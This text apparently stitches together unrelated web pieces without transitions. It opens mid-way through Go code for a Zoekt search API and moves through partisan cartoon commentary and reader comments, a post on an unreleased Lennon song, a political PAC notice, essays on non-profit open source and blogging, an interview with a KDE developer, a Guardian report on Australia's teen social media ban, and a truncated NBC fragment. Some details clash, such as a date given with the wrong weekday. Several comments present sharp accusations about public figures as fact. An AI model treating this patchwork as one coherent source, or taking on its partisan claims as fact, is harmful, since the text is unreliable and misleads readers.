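	out, _ := io.ReadAll(resp.Body)
	fmt.Println(string(out)) // raw JSON search results
}

Running it against a local zoekt-webserver started as above should print the search results; an equivalent POST with curl to the same URL behaves the same way.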
Finally, the web server exposes a gRPC API that supports structured query objects and advanced search options.
Thanks to Han-Wen Nienhuys for creating Zoekt. Thanks to Alexander Neubeck for coming up with this idea, and helping Han-Wen Nienhuys flesh it out.
No War on Venezuela, Money for People's Needs, Not the War Machine -- Poster
Dr. James MacLeod
December 4, 2025
MacLeodCartoons
Re: Opinion: Everyone Is Talking About Affordability — and Making the Same Mistake
Outlawing stock buybacks, which were once illegal, would be a crucial way to address the wage issue.
Given the corruption of our lawmakers, this is a long shot to be realized, but like Medicare for All it is a crucial demand to raise and tie to the problem of depressed wages.
Jessica Benjamin
Students attending school in the winter, mostly in the Midwest or on the East Coast, get a Snow Day: if a heavy snowstorm blankets their town, school is canceled and kids can play all day. In Los Angeles, students have not been going to school out of fear of being terrorized and kidnapped by our own government. You can keep ICE Day.
Lalo's cartoon archive can be seen here.
Lalo Alcaraz
December 3, 2025
CALÓ NEWS
Re: Amber Czech Was Murdered at Work. Tradeswomen Say It Could Have Happened to Any of Them.
This is horrible; I was a shop steward for 35 years in the carpenters union local 157 NYC.
We take a harassment class and get certified among a dozen other certifications.
None of this only happens on non-union jobs.
No woman is harassed on any of my jobs, let alone killed.
Harassment of women is on the rise, and maybe it is because a rapist is in the White House?
You can’t just look the other way; if you do, you are an enabler.
There are so many things the public sees and turns a blind eye to!!!
Humans are tribal, and we have good tribes and bad; it is your choice.
You can’t stand and listen to the president call a woman reporter “Piggie” and not call him out on the spot.
Stupid and arrogant are not very good qualities in the most powerful job in the world.
My union is the only place where women get the same pay as the men.
Speak up, not after the fact.
Manipulation is rampant.
John Campo
Given that Trump is now pardoning drug traffickers—and we’ve watched him hand out clemency and favors to people who bought into his latest crypto grift—it’s becoming pretty clear that these so-called traffickers have one guaranteed way to avoid being targeted: buy what Trump is selling.
Nick Anderson
December 1, 2025
Pen Strokes
Re: Palestinians Offer a Much Clearer Path to Peace
"International law also requires adhering to the International Court of Justice advisory opinion in July 2024, which ruled that the entire occupation of Palestinian territories is illegal and must end. That would mean insisting that Israel withdraw from sovereign Palestinian territory, as the international force moves in for the transition to Palestinian governance. An international force, from the Palestinian perspective, is welcome under those terms – a whole chapter in the Palestinian Armistice plan is devoted to the issue."
Bill Rogers
Posted on
Portside's Facebook page
Re: Peace in Ukraine – Peace in Europe
The Party of the European Left has condemned Russia’s military aggression against Ukraine as a violation of international law and denial of Ukraine’s sovereignty. However the EL has not aligned itself with NATO whose objective has been to end the war through military means. The ongoing war in Ukraine has claimed hundreds of thousands of lives, destroyed hundreds of towns and villages, and forced millions of people to flee. The danger of escalation into a general war between Russia and NATO persists and continues to grow. The EL stresses once more that all political and diplomatic initiatives aimed at achieving a ceasefire, bringing the war to a lasting and durable end, and preventing any further escalation must be taken, strengthened, and implemented immediately. Our solidarity can only be with the victims—the soldiers, civilians, refugees, and conscientious objectors on both sides—and not with the imperialist interests that fuel the conflict.
John Gilbert
Posted on
Portside's Facebook page
Re: To Win Radical Success, Mamdani Understands, Is To Know When and Where To Compromise
I would call it building a coalition around central shared goals. In the past it has too often been a move to the so-called center, which has been to capitulate to corporate Dems and to soft-pedal imperialist atrocities, abandoning the interest of working people in the process. If the goals remain true to achieving affordability and dignity for ordinary working people of all races and religions, then let's give it a try. There are lots of good people out there. We may have differences about exactly how to achieve our goals, but so many have ideas and experience that can help build a brand new plan, an effective plan that has never existed before.
Sonia Cobbins
Posted on
Portside's Facebook page
Con Job President -- Cartoon and Commentary by Clay Jones
When Donald Trump became president in 2016, he was fortunate that he was inheriting President Barack Obama's economy. It was such a strong economy he inherited that it took him almost 4 years to fuck it up. Although throughout those four years, Trump took credit for the economy that the Black man created for him. What was really messed up is that in 2024, voters forgot who created that economy, and they restored Donald Trump back into the presidency, believing he had something to do with it. Not only did voters forget that Donald Trump had nothing to do with creating a great economy, but they also forgot that he ruined President Obama's great economy and left office in 2020 with the biggest loss of jobs since Hoover. In 2024, Trump ran against Biden's economy, which most people felt was not strong enough. Since Trump has returned to office, the economy has gotten worse. While he claims Biden's inflation at the time he came into office was bad, that has gotten worse, too, since he's been in charge. Voters are starting to figure out that Trump has no idea how to build an economy. What might be freaking Trump out is that he might be realizing it, too.
Donald Trump knows how to rage-tweet while sitting on the toilet at 3 AM. Managing the largest economy in the world, not so much.
A recent Fox News poll found that 76% of voters view the economy negatively. Another poll by the Economist and YouGov finds that 58% disapprove of the job Trump is doing. Trump's polls on the economy are worse than Biden's were.
Even Trump must realize it, since he is lifting all tariffs on commodities like coffee, meat, and other foods. I guess we are supposed to forget his belief that tariffs don't raise prices, which is hard to argue while tariffs are raising prices. TACO indeed.
But Trump is becoming frustrated with the public for not appreciating the job he sucks at. During a cabinet meeting yesterday, Trump declared that affordability “doesn’t mean anything to anybody.” I'm sure it means something to all those congressional Republicans retiring before the midterms.
Trump called the issue of affordability a “fake narrative” and “con job” created by Democrats to dupe the public.
He said, “They just say the word. It doesn’t mean anything to anybody. They just say it — affordability. I inherited the worst inflation in history. There was no affordability. Nobody could afford anything.”
Of course, Trump, along with voters, forgets that President Biden inherited Trump's economy in 2020. The difference between Trump and Biden inheriting bad economies is that Biden fixed the one he got.
Republicans left bad economies for presidents Clinton, Obama, and Biden. And those presidents fixed them. Republicans are great at trashing economies, while Democrats are great at repairing them.
Donald Trump was calling himself the “affordability president,” but he's really only affordable for the people who bribe him, like crypto moguls and Saudi royalty. Democrats are going to be running a lot of commercials with Trump's affordability/con job comment.
I just hope the economy isn't trashed beyond repair by the time a Democrat is elected to repair the damage Trump has done to it.
Clay Jones
December 3, 2025
Claytoonz
Watching Rainbows -- Unreleased song by John Lennon
Mr. Fish
MR. FISH’S CATCH OF THE DAY
December 4, 2025
The Independent Ink
Your MR. FISH’S CATCH OF THE DAY for Tuesday, December 4, 2025, is an unreleased Beatles song that I’ve been listening to for 40 years. It’s called Watching Rainbows and was recorded in 1969 during the Let it Be sessions as an improvised Lennon throwaway. Remarkably, it was not included in Peter Jackson’s documentary miniseries, Get Back, nor was it included on any of the Anthology releases. Here are the lyrics, most likely invented by Lennon on the spot:
Standing in the garden waiting for the sun to shine
With my umbrella with its head I wish it was mine
Everybody knows…
Instead of watching rainbows I’m gonna make me some
I said I’m watching rainbows I’m gonna make me some
Standing in the garden waiting for the English sun to come and make me brown so I can be someone
Looking at the bench of next door neighbors
Crying, I said c’mon, I said, save us
Everybody’s got to have something hard to hold
Well, instead of watching rainbows under the sun
You gotta get out son and make you one
You gotta get out son and make your own
Because you’re ain’t gonna make it if you don’t
Shoot me
Shoot me
Whatever you do you gotta kill somebody to get what you wanna get
You gotta shoot me
You gotta shoot me
Please shoot me
Even before the Now and Then single was released in 2023 and announced as the “last Beatles song,” I thought Rainbows should be stitched together with McCartney’s Pillow for Your Head and Harrison’s Mother Divine , both incomplete compositions from the same time period, and released as a B-side medley to a re-release of the medley that closed out Abbey Road . The connecting tissue for Divine Rainbow Pillow could be composed by the two surviving members of the band, of course. In other words, now that we’ve all heard Now and Then and had our hearts broken by its mediocre production and flabby, uninspired demeanor, I can’t be alone in wishing there was a better swan song for the group! (Additionally, I have no fewer than 10 solo Lennon tracks that he recorded in the late 70s that all would’ve been better to riff off of for a “last” Beatles song — anything other than Now and Then , but I’ll save those for a later post - ha!)
Here are the tracks. Dig it.
Mon, Dec 8 ⸱ 2-3pm ET • 1-2pm CT • Noon-1pm MT • 11am-Noon PT
Virtual Event ⸱ Zoom link shared after registration
Join Movement Voter PAC for our final briefing of the year – more of a “fireside chat” with movement leaders! – to celebrate our successes in 2025 and look ahead to 2026.
Speakers:
Notes:
MVP funds local organizing and movement-building groups working to shift culture, win power, and shape policy.
We just put out our 2025 recap — if you haven’t yet, check it out to see the incredible work MVP partners did this year to push for policy progress, turn back the tide of authoritarianism, and win the biggest elections of the year.
MVP operates like a “mutual fund” for political giving: We raise money from donors, then channel it toward the most impactful organizations and power-building work around the country.
We do the research so you don’t have to, streamlining your giving and maximizing your impact by investing in the most effective organizations and innovative strategies. (Bonus: You get to hit "unsubscribe" on all the political fundraising spam in your inbox!)
Movement Voter Project
37 Bridge Street, Box 749
Northampton, MA 01060
For all news and media inquiries, email press@movement.vote.
I feel a change is happening in how people produce and (want to) consume software, and I want to give my two cents on the matter.
It has become more mainstream to see people critical of "Big Tech". Enshittification has become a familiar term even outside the geek community. Obnoxious "AI" features that nobody asked for get crammed into products. Software that spies on its users is awfully common. Software updates have started crippling existing features, or have deliberately stopped being available, so more new devices can be sold. Finally, it is increasingly common to get obnoxious ads shoved in your face, even in software you have already paid for .
In short, it has become hard to really trust software. It often does not act in the user's best interest. At the same time, we are entrusting software with more and more of our lives.
Thankfully, new projects are springing up which are using a different governance model. Instead of a for-profit commercial business, there is a non-profit backing them. Some examples of more or less popular projects:
Some of these are older projects, but there seems to be something in the air that is causing more projects to move to non-profit governance, and for people to choose these.
As I was preparing this article, I saw an announcement that ghostty now has a non-profit organisation behind it. At the same time, I see more reports from developers leaving GitHub for Codeberg , and in the mainstream more and more people are switching to Signal.
From a user perspective, free software and open source software (FOSS) has advantages over proprietary software. For instance, you can study the code to see what it does. This alone can deter manufacturers from putting in user-hostile features. You can also remove or change what you dislike or add features you would like to see. If you are unable to code, you can usually find someone else to do it for you.
Unfortunately, this is not enough. Simply having the ability to see and change the code does not help when the program is a web service. Network effects will ensure that the "main instance" is the only viable place to use this; you have all your data there, and all your friends are there. And hosting the software yourself is hard for non-technical people. Even highly technical people often find it too much of a hassle.
Also, code can be very complex! Often, only the team behind it can realistically further develop it. This means you can run it yourself, but still are dependent on the manufacturer for the direction of the product. This is how you get, for example, AI features in GitLab and ads in Ubuntu Linux. One can technically remove or disable those features, but it is hard to keep such a modified version (a fork ) up with the manufacturer's more desirable changes.
The reason is that the companies creating these products are still motivated by profit and increasing shareholder value. As long as the product still provides (enough) value, users will put up with misfeatures. The (perceived) cost of switching is too high.
Let us say a non-profit is behind the software. It is available under a 100% FOSS license. Then there are still ways things can go south. I think this happens most commonly if the funding is not in order.
For example, Mozilla is often criticised for receiving funding from Google. In return, it uses Google as the default search. To make it less dependent on Google, Mozilla acquired Pocket and integrated it into the browser. It also added ads on the home screen. Both of these actions have also been criticized. I do not want to pick on Mozilla (I use Firefox every day). It has clearly been struggling to make ends meet in a way that is consistent with its goals and values.
I think the biggest risk factor is (ironically) if the non-profit does not have a sustainable business model and has to rely on funding from other groups. This can compromise the vision, like in Mozilla's case. For web software, the obvious business model is a SaaS platform that offers the software. This allows the non-profit to make money from the convenience of not having to administer it yourself.
Ah, good old volunteer driven FOSS. Personally, I prefer using such software in general. There is no profit motive in sight and the developers are just scratching their own itch. Nobody is focused on growth and attracting more customers. Instead, the software does only what it has to do with a minimum of fuss.
I love that aspect, but it is also a problem. Developers often do not care about ease of use for beginners. Software like this is often a power tool for power users, with lots of sharp edges. Perfect for developers, not so much for the general public.
More importantly, volunteer driven FOSS has other limits. Developer burn-out happens more than we would like to admit , and for-profit companies tend to strip-mine the commons .
There are some solutions available for volunteer-driven projects. For example Clojurists together , thanks.dev , the Apache Foundation , the Software Freedom Conservancy and NLNet all financially support volunteer-driven projects. But it is not easy to apply to these, and volunteer-driven projects are often simply not organized in a way to receive money.
With a non-profit organisation employing the maintainers of a project, there is more guarantee of continuity. It also can ensure that the "boring" but important work gets done. Good interface design, documentation, customer support. All that good stuff. If there are paying users, I expect that you get some of the benefits of corporate-driven software and less of the drawbacks.
That is why I believe these types of projects will be the go-to source for sustainable, trustworthy software for end-users. I think it is important to increase awareness about such projects. They offer alternatives to Big Tech software that are palatable to non-technical users.
Posted at December 04, 2025
Before social media became what it is today I used to blog a lot. And I wasn't the only one, many people did. There was this idea of a decentralized and open web: everyone had their own little space on the web (with a selfhosted blog, or a platform like wordpress or blogger).
The internet looks very different now. People consume (and produce) more on the internet than ever before, but almost all content lives on these big social media platforms designed to keep everything and everyone inside. It feels like the web is shrinking.
There seems to be some resurgence of interest in the old web now; time will tell if it gains any real ground. It's an uphill battle: besides most online eyeballs now being glued to social media apps, we're seeing AI take over the way people interact with the internet altogether. Back in the old days, if you wanted to know more about something you'd google the term and start going through the websites Google said were most relevant. Now AI is a lot more efficient at getting the answer to whatever you want to know in front of you in real time. If the answer was on a forum, blog or any other website, the AI will fetch it behind the scenes and summarize it for you. From a UX perspective this is the obvious direction things will continue to go.
A second problem is that of quality: people who put a lot of time in their content (and are very good writers) can now more easily get paid for their work, through paid email newsletters and paywalled websites. All of their content doesn't live on the open web anymore (but at least there are no ads here). This is probably a win for writers, as well as the quality of the overall content being produced (and read) globally, but it's a loss for the open web.
So if you have a blog nowadays with all kinds of useful information (ignoring the discoverability as well as whether other people actually find it useful), how many people are really going to read it directly? Should you still put time into designing your blog and writing good articles?
Regardless of all of this, I feel a (nostalgic) desire to blog again. I used to keep two blogs: this techblog you are reading now and a travel/picture blog called mijnrealiteit . Whenever I get this feeling, I start by updating the blog software. Throughout the years both blogs have gone through different iterations: from custom CMS systems, to WordPress instances with custom themes, to simple statically generated websites. You can find some historical posts here .
So towards an AI coding tool I turn, which has the power to write or change hundreds of lines of code in seconds from a simple one-sentence instruction. AI coding tools are a widely debated topic in programming circles. They can clearly write a lot of code very quickly, and in my experience there are definitely cases where the speed/quality outpaces what a human developer can do. But there are also many cases where they write junk (called slop) and do things that make no sense.
I actually wanted to do the very opposite of what "vibe coders" typically use AI tools for: instead of providing a simple (and vague) instruction to let the AI go crazy and build a new blog from scratch, I used it to strip/simplify my existing blog software towards the open web hygiene I value:
You can find the code for mijnrealiteit on github , I'll publish the code for this blog soon as well.
It's all live now, as well as a super minimal "about me" site on mvr.com . So I can get back to blogging! Will anyone actually read anything I post? I won't know, since I removed all trackers. So for now I am screaming into the void.
I know @Aks from IRC. He works on KDE Software, has made many lovely games and I even use his colorscheme in my terminal!
Please introduce yourself!
I'm Akseli but I usually go as Aks on the internet. I'm in my 30s and I'm from Finland. I've liked computers since I was a kid, so naturally I ended up doing computer stuff as a day job. Nowadays I work on KDE software at TechPaladin.
How did you first discover computers as a kid?
I was 3-4 years old. We had an old 386 DOS computer and I usually played games like Stunts on it. I was always behind when it came to hardware. While all my peers at school would have PS2s, I played on NES and PS1. Over time I just liked to play and tinker with different kinds of machines, mostly old left-over computers. But games were my main hook, I always wanted to make my own. And I did !
What were your first games like?
My very first game was with FPS Creator when I was ~13. My friend and I had some inside joke about a game with tons of enemies and a gun with 6 bullets, so I ended up recreating that. The game is really bad , but that was sort of the point. The next game I made when I was 18 or so, with Unity. Similar theme, but this time the enemies were dancing and bouncing skeletons, and you had a shotgun. It was so silly. I then made a roguelike, a 3D platformer, and an FPS called Penance that has about 19k downloads. You can find my games on Itch. Lately though, I haven't had the energy to finish my game projects, e.g. Artificial Rage: https://codeberg.org/akselmo/Artificial-Rage
I sank a fair few hours into Penance! I also really liked the Christmas game you made for your sister. Do you ever put Easter eggs in code or often make projects for others like that?
I put in some Easter eggs. For example, someone complained that in Penance all the weapons look like woolen socks(?), so I added a pair of wooly socks in the starting area. I also proposed to my wife with a game, which had a small hallway with pictures of us. It was a fun little project, but a bit cut short since I tried to work on it in secret, which proved difficult! We have made a few games together. She went to a web-dev bootcamp but doesn't code anymore, although she gladly works with me on various game projects.
How do you ideate the game play, style and such things?
While playing, I usually think it "would be cool if I had this game but changed this and that.." which provides a great starting point. Then it just naturally evolves into its own thing. Penance was pretty much me going "I want Quake but with randomly generated levels" but then I ended up making a campaign with handcrafted levels for it anyway, besides the randomly generated endless mode.
Really, I just make things I want to play. People liking it is just a bonus. One of my favorite game projects is Castle Rodok because it is full of lore about my own RPG world. It's not very popular, but I like it a lot. It was a passion project.
What languages and technologies did you use?
With tools, I'm driven by need more than wants. My day job is all C++, which I'm fine with. I am very much a fan of "C-style" languages. They're boring and get the job done. For things I want to get running quick, I usually use Python, which I used a lot in test automation for all kinds of devices. Mostly medical devices so I can't talk about them due to NDAs.
Most of my games have been in Unity, but Crypt of Darne uses Python and I also have played around with C and Odin for my game projects.
I have tried LISPs and functional programming languages and such, but I just have a hard time with them. Especially with those that propose a completely different syntax for me. I haven't had any projects with Rust but I liked tinkering with it, besides the ' lifetime syntax which I easily miss. I am very boring when it comes to programming languages, I like to stick with what I know. I wanderlust about what I can create: Games, apps, systems software, drivers... Many ideas but hardly any time. But work comes first, so I mostly work on KDE things right now. For my own things, if I feel like working on a game, I go with the flow and do that.
What was your experience with different OS before finding KDE ?
I'd wanted to move on from Windows and dabbled with Linux a bunch, but could never stick to it because I could not play any games I owned in Linux. When I learned that Linux systems can in fact game, it didn't take me long to switch. At first, I just dual-booted and tested the waters. I tried Linux Mint and Ubuntu, which were fine, but I had some issues with X11 and its compositing eating all the FPS, so I gave up for a while. 6 months later I tried Kubuntu, which worked really well for my needs. After some time I hopped to Fedora KDE, and there I found out that Wayland completely removed the issue with the compositing eating FPS in games. KDE was also very easy to learn and understand. I didn't really need to customize it. Then I found an annoying bug I wanted to fix and started to contribute.
What was the first contribution experience like?
I had no idea how to do anything with C++. I learned C from scratch making Artificial Rage , studying how to create a project with CMake and all that, but luckily the internet is full of advice. So I had not used C++ before and just started learning to make that first contribution! I just joined the Matrix chats and asked questions; people were very helpful. Onboarding was great. It wasn't very big though, I just looked at the surrounding code and made my contribution look the part. Feedback in the merge request on Gitlab helped wrap it up. One of my first larger contributions though was adding region and language settings to System Settings. This allowed users to change, for example, date-time settings separately from currency. This was a mix of C and C++ and was difficult! Diligently reading the docs, looking at similar code and a lot of build->test->change->build again... it started to work! Then the reviews helped too. But C++ is such a different beast, I'm still learning it to this day. I'd say I know less C++ and more about problem solving.
It also helps that the "Qt dialect" of C++ is rather nice. The Qt framework does a lot of the work for you. For example, the signal and slot system or objects having parent objects that clear their children when they're deconstructed. Qt's documentation is also pretty great.
I'm still learning and don't have much in depth knowledge, but I hate header files. Modifying the same thing (function declarations) in two places makes no sense. It should autogenerate as part of the compilation. I found some such header generating tools, but they go unused and quietly forgotten. I suspect they would confuse language servers too, so it's a tooling issue.
What are your thoughts on Linux over all, big things which need changing but no one is working on or nice initiatives which you think will improve things, etc.?
The Linux desktop is getting much, much better and I see a hopeful future. Will it ever be the main OS, like Windows is? Probably not, unless hardware manufacturers/OEMs start installing Linux distros by default, instead of Windows. But I'm hopeful we'll get to 5%-10% worldwide usage. Now that gaming is possible on Linux, a lot of people have moved over. Just a few weeks ago I installed Bazzite for my friend who has been using Windows forever, but didn't want to use Win11.
Our next step is to make sure accessibility is up to snuff. At least for KDE, we have an accessibility engineer who is brilliant at their job. Then, I think immutable systems might get more popular. Personally I'm fine with either, but for those who view their computer more as an appliance than a computer, immutable systems are very nice: They allow them to jump from broken state back to working state with ease (select different boot entry at startup).
Complex software's never done; improvements are always needed. Accessibility means more than just accessibility settings: Make it easy to install, test, run, etc... If Linux desktops can get more hardware manufacturers on board to install Linux desktop as default, that will certainly help too. Also shoutout to the EndOf10 ( https://endof10.org/ ) initiative; when I shared it around to my non-nerdy friends, they were very curious about the Linux desktop and I had an excuse to ramble about it to them! In a nutshell: I am hopeful, but we can't rest on our laurels. We need to stop fighting about "what's the best desktop" and work together more.
BTW, if anyone reading this has been Linux curious, go for it! Take a secondary device and play around with it there. And don't be afraid to contribute to things you like in any way you can, be it software, hardware, or the actual physical world.
How do you see it in light of more phone usage, less desktop usage? Have you any impressions of governments or businesses moving to linux?
Computers are still widely used where I live, at least within my generation. Those who game especially often have a desktop PC. It may not be top-of-the-line hardcore gaming rig, but they have one to play a bit of Counter-Strike or similar games.
Phones are the king of "basic stuff" and for many people a tablet functions as a simple internet appliance. I can only hope that projects like PostmarketOS ( https://postmarketos.org/ ) will help to keep these tablets and phones working when the regular Android updates stop, to ease the avalanche of e-waste.
When it comes to governments and businesses, I wish they did it more. I have heard that in Germany more governments are testing it out. In Finland, I do not know, but I would like to drive more for it. It's certainly an area where we should try to help as much as possible as well.
How can we (individuals or organizations) help?
Individual users: Make sure to report bugs and issues, and share knowledge. Do not evangelize or push the matter, just say it's something you use and elaborate when people ask. Too many times I've seen people pushed away from using the Linux desktop because people are very... pushy. As surprising as it may be, not many people really care as much as we do!
Organizations: Try to adopt more FOSS technologies for daily things, e.g. LibreOffice. Start small. It does not need to be an overnight change, just small things here and there.
How many resources do you have compared to the demands of everything you are working on?
We're definitely stretched. We always could use more help, though C++ seems to deter that help a bit, which I can understand. But if I could learn it from scratch, I'm sure anyone can! Besides, more and more projects use QML and Rust. For testing, there's Python.
What prerequisites are there for contributing?
We have Matrix chat for new contributors, where people can ask questions (and answering questions there is also a way to contribute.) All of it is documented . When triaging, I am trying to more often tag bugs in bugzilla as "junior jobs" to make things more approachable. Mentoring etc. is a community effort, and those who are willing to learn will receive help, though we're all rather busy so we hope people put some effort into trying to learn things too, of course.
How could bug reporting be improved?
I think we could half-automate bug reports to make things easier: gather basic information and ask basic questions up front, without needing to open a web browser. For crash reports, we use a tool called DrKonqi: when an app crashes, it gathers backtraces and so on automagically and lets the user type what happened in a field. Something similar for regular ol' bugs would be great. Games do this by capturing screenshots and logs when the player opens the bug-report tool. But someone would still have to go through them, which is also an excellent way for anyone to contribute: go through some bug reports, see if you can reproduce them or not, and report back with your system information. Anyone can do it; it's not a difficult job, just a bit tedious, especially when there are thousands of bug reports and 10 people going through them.
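To make the "gather basic information up front" idea concrete, here is a minimal, hypothetical sketch (not an actual KDE or DrKonqi tool) of what a pre-filled bug-report helper could collect; the `plasmashell --version` call is just one example of a desktop-specific detail worth attaching:

```python
import json
import platform
import subprocess

def gather_basic_info() -> dict:
    """Collect the basics a triager usually asks for up front.
    Hypothetical helper, not an actual KDE/DrKonqi tool."""
    info = {
        "os": platform.platform(),
        "machine": platform.machine(),
    }
    # Desktop-specific detail, if the environment provides it
    try:
        out = subprocess.run(["plasmashell", "--version"],
                             capture_output=True, text=True, timeout=5)
        info["plasmashell"] = out.stdout.strip() or "unknown"
    except (FileNotFoundError, subprocess.TimeoutExpired):
        info["plasmashell"] = "not found"
    return info

if __name__ == "__main__":
    # Paste this JSON blob into the bug report alongside your description.
    print(json.dumps(gather_basic_info(), indent=2))
```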
How do you approach problem solving?
Depends on the problem! If a bug causes a crash, a backtrace is usually helpful. If not, I go with trusty print-debugging to see exactly where things start acting weird. I like to approach it from many different angles at the same time:
`git blame` is a good friend, and asking people who implemented things can really help. But sometimes I work on code where it just says "moved to git in 2013" and the original code's from the 90s. Anything that pokes your brain in multiple different directions.
I really like the idea of fixing a bug in multiple ways to really see what's needed. How do you determine whether something is the proper fix or not?
Sometimes the code just "feels right" or someone more knowledgeable can tell me. Of course, fixing simple visual errors should not need a ton of changes around the codebase. Changes should be proportional to the bug's difficulty/complexity, but there's no clear answer. It's more a gut feeling.
What inspires you to have an online presence (on IRC, in comments, blog posts, etc.)? How do you decide whether to make a blog post or not?
For blog posts, I ask myself: "Do I need to remember this?" Some are just a note for myself, which others might find useful too.
I once deleted my lobste.rs account because it took up too much time. Now that all my work is remote, I kind of miss coffee breaks and office chitchat, so I hang about on IRC, Matrix, the Fediverse, Lobsters, etc. to fill my Sims status bar. I still prefer remote work, but I wouldn't mind a hybrid option at times. Also, removing the lobste.rs bookmark stopped me reflexively clicking it.
Since learning I have ADHD and very likely autism, I have worked on myself (mentally) and internalized that I don't need to constantly go through these sites. Notice the problematic behavior, then cut it out. Whenever I notice I'm stuck in a loop opening and closing the same sites, I've learned to close the web browser and do something else. The hardest part is actually noticing it.
Do you have any interesting personal tools? I use your colorscheme.
I journal a lot on a reMarkable 2 tablet while working, writing down what I have done, what I should do, or notes to help figure out problems. Writing by hand helps me remember things too. I also made an RSS "newspaper" script for my tablet, which now shows the daily weather as well.
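As a rough illustration of what such an RSS "newspaper" script might look like, here is a minimal sketch assuming the third-party feedparser library; the feed URLs are placeholders, and the weather and tablet-upload parts of the real tool are left out:

```python
import datetime
import feedparser  # third-party: pip install feedparser

# Hypothetical feed list; substitute your own
FEEDS = [
    "https://planet.kde.org/global/atom.xml",
    "https://lwn.net/headlines/rss",
]

def build_newspaper(feeds: list[str], max_items: int = 5) -> str:
    """Render today's headlines as a plain-text 'newspaper' page."""
    today = datetime.date.today().isoformat()
    lines = [f"Daily newspaper - {today}", ""]
    for url in feeds:
        parsed = feedparser.parse(url)
        lines.append(parsed.feed.get("title", url))
        for entry in parsed.entries[:max_items]:
            lines.append(f"  * {entry.get('title', '(untitled)')}")
        lines.append("")
    return "\n".join(lines)

if __name__ == "__main__":
    # Converting this to PDF/EPUB and pushing it to the tablet is out of scope here.
    print(build_newspaper(FEEDS))
```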
I also use todo.txt for tasks, like my own list of bugs and other projects I need to go through. I even wrote an app for it called KomoDo.
Then I use Obsidian for any technical notes and know-how, like programming and computer things that are a pain to write by hand.
When did you migrate to Codeberg?
It was even before GitHub started getting "AI" stuff. I just got tired of GitHub being a social media site instead of a good platform. SourceHut would have been nice too; I just didn't know of it at the time. I'm also wary of the email workflow, but wouldn't be opposed to learning it.
As Australia prepares to block under-16s from accessing 10 of its largest social media platforms, less prominent companies have begun courting the teen market – in some cases paying underaged influencers to promote them.
One teenaged TikTok influencer said in a paid “collab” video for the app Coverstar: “The social media ban is fast approaching, but I found the new cool app we can all move to.”
From 10 December all under-16s in Australia will notionally be banned from TikTok, Instagram, Snapchat, YouTube, Reddit, Twitch, Kick and X as Australia’s world-first social media laws come into effect.
Questions remain about how effective the ban will be, with many children hoping to circumvent it. Others have started looking elsewhere for their social media fix.
Along with Coverstar, lesser known apps such as Lemon8 and photo-sharing app Yope have skyrocketed on Australia’s download charts in recent weeks, currently ranked first and second in Apple’s lifestyle category respectively.
The government has repeatedly said its ban list is “dynamic”, with the potential for new apps to be added. Experts have raised concerns the government is starting a game of “whack-a-mole”, pushing children and teenagers to lesser known corners of the internet.
“A potential consequence of this legislation is that it might actually inadvertently create more risk for young people,” says Dr Catherine Page Jeffery, an expert in digital media and technological change at the University of Sydney.
“There is a very real possibility that, if young people do migrate to less regulated platforms, they become more secretive about their social media use because they’re not supposed to be on there, and therefore if they do encounter concerning material or have harmful experiences online that they won’t talk to their parents about it.”
Here’s what we know about some of the apps where children are migrating.
The US-based video-sharing platform Coverstar describes itself as a “new kind of social app for Gen Alpha – built for creativity, powered by AI, and safer than TikTok”. The app, which is not covered by the social media ban, sits at number 45 on Apple’s Australian downloads chart.
The video-sharing platform allows children as young as four to livestream, post videos and comment. Users under the age of 13 require a parent to film themselves saying “My name is ____ and I give permission to use Coverstar”, which is then verified by the app. Adults are also free to make an account, post content and interact in the comments sections.
Like TikTok and Instagram, users can spend real money to buy virtual “gifts” to send to creators who go live, and the app also includes a “premium” paid subscription with advanced features.
Coverstar advertises its safety features as a lack of direct messaging, a strict no-bullying policy and 24/7 monitoring by AI and human moderators.
Dr Jennifer Beckett, an expert in online governance and social media moderation from the University of Melbourne, says Coverstar’s repeated promotion of their use of AI raises some questions.
“They are really spruiking that they use [AI] a lot, and it’s not great,” she says.
AI has been widely used in social media moderation for years; however, Beckett says it has significant limitations.
“It is not nuanced, it is not contextual. It’s why you have a layer of humans on the top. The question is: how many humans do they have?”
Coverstar has been contacted for comment.
Lemon8, an Instagram-esque photo and video-sharing app owned by TikTok’s parent company, ByteDance, has boomed in popularity in recent weeks.
Users can connect a TikTok account, allowing them to seamlessly transport video content over to Lemon8. They can also re-follow all their favourite TikTok accounts on the new platform with a single tap.
However, on Tuesday Australia’s eSafety commissioner, Julie Inman Grant, announced that her office had written to Lemon8, recommending it self-assess to determine if the new laws apply to it.
With only 1,400 reviews on the Apple app store, Yope is a “friend-only private photo messaging app” that has been floated as a post-ban alternative to Snapchat.
Yope’s cofounder and chief executive, Bahram Ismailau, described the operation as “a small team of a few dozen people building the best space for teens to share photos with friends”.
As with Lemon8, Australia's eSafety commissioner said she had written to Yope, advising it to self-assess. Ismailau told the Guardian he had not received any correspondence but was "ready to provide our official position on the overall eSafety policy regarding age-restricted social media platforms".
He said that after conducting a self-assessment Yope believes it fully meets the exemption in the law that excludes apps that are solely or primarily designed for messaging, emailing, video or voice calling.
“Yope is a photo messenger with no public content,” Ismailau said. “Yope is fundamentally as safe as iMessage or WhatsApp.”
Yope’s website states the app is for users aged over 13, and those between 13 and 18 “may use the app only with the involvement of a parent or guardian”. However the Guardian was able to create an account for a fictional four-year-old named Child Babyface without any requirement for parental permission.
A mobile phone number is required to create an account.
Ismailau did not directly respond to questions about the under-13s account, however he noted the team was planning to update their privacy policy and terms of use within the next week to “better reflect how the app is actually used and who it’s intended for”.
Also known as Xiaohongshu, this Chinese video-sharing app was the destination of choice for Americans during TikTok’s brief ban in the US earlier this year.
Beckett said the app may be a safe place to go. “They have much stronger regulations on social media in China – and we see that reflected in the kinds of content that has to be moderated,” she says. “So I would almost say if you’re going to go somewhere, it’s probably the safest place to go.
“It’s not without its trials and tribulations because we know on TikTok, even when it was still in Bytedance’s control, there was so much pro-ana [anorexia] content.”
However, cybersecurity experts say the app collects extensive personal data, which it can share with third-party platforms or may be compelled by law to share with the Chinese government.
Even with an ever-expanding list of banned social media sites, experts say the government is underestimating children’s desire to use social media – and their creativity when it comes to finding a way.
“I don’t think we give them enough credit for how smart they are,” Beckett says. “Kids are geniuses when it comes to pushing boundaries.”
Anecdotally, the Guardian understands some children have been discussing using website builders to create their own forums and chat boards. Others have suggested chatting via a shared Google Doc if texting isn’t an option for them.
“They’re going to get around it,” Beckett said. “They’ll figure it out.”
NBC News, back in March 2018:
Speaking at a town hall event hosted by MSNBC’s Chris Hayes and Recode’s Kara Swisher, Cook said Facebook put profits above all else when it allegedly allowed user data to be taken through connected apps. [...]
